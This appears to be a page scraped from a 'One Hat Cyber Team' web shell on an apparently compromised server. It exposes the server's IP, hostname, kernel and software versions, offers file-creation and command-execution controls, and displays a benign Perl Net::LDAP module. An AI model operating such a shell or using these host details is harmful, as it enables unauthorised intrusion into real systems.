One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
perl5
/
vendor_perl
/
Net
/
LDAP
/
View File Name :
Extension.pm
# Copyright (c) 1998-2004 Graham Barr <gbarr@pobox.com>. All rights reserved. # This program is free software; you can redistribute it and/or # modify it under the same terms as Perl itself. package Net::LDAP::Extension; our @ISA = qw(Net::LDAP::Message); our $VERSION = '1.04'; #fetch the response name sub response_name { my $self = shift; $self->sync unless exists $self->{resultCode}; exists $self->{responseName} ? $self->{responseName} : undef; } # fetch the response value sub response { my $self = shift; $self->sync unless exists $self->{resultCode}; exists $self->{responseValue} ? $self->{responseValue} : undef; } 1;